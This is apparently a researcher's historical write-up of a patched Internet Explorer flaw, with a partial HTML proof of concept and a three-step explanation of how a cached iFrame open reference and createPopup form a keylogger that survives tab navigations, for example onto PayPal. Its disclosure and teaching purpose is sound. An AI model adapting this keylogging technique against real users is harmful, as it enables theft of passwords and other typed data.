This one combined several of the techniques I had been exploring — a cached iFrame open reference, a background navigation, and a createPopup — into a persistent in-tab keylogger. The popup would capture every keystroke the user typed within the tab, surviving any number of navigations, until the tab was closed.
```html
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>KeyLogger_Resident_createPopup_Captures_KeyStrokes</title>
</head>
<body>
<script language="JavaScript">
// Step 1: open a new tab with dummy_iframe.html, which stores its
// iFrame's open method as opener.iOpen before navigating the tab away.
function main()
{
window.open("dummy_iframe.html");
}
// Step 2: use the cached open reference to load createpopup.html into
// the iFrame's slot even though the tab has already navigated.
function runScript()
{
iOpen("createpopup.html", "_top");
}
</script>
</body>
</html>
```
The attack worked in three steps. First, a new tab was opened with dummy_iframe.html, which contained an iFrame and saved the iFrame’s open method as opener.iOpen, then navigated the tab to PayPal (or any other site). Second, the main page called iOpen("createpopup.html", "_top"), which loaded createpopup.html into the iFrame’s slot even though the tab had navigated away, because the cached open reference still worked across the navigation. Third, createpopup.html created a createPopup covering the tab and attached a keydown listener to log everything typed. Because the popup was not torn down on navigation, it survived subsequent navigations within the same tab, silently collecting keystrokes.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.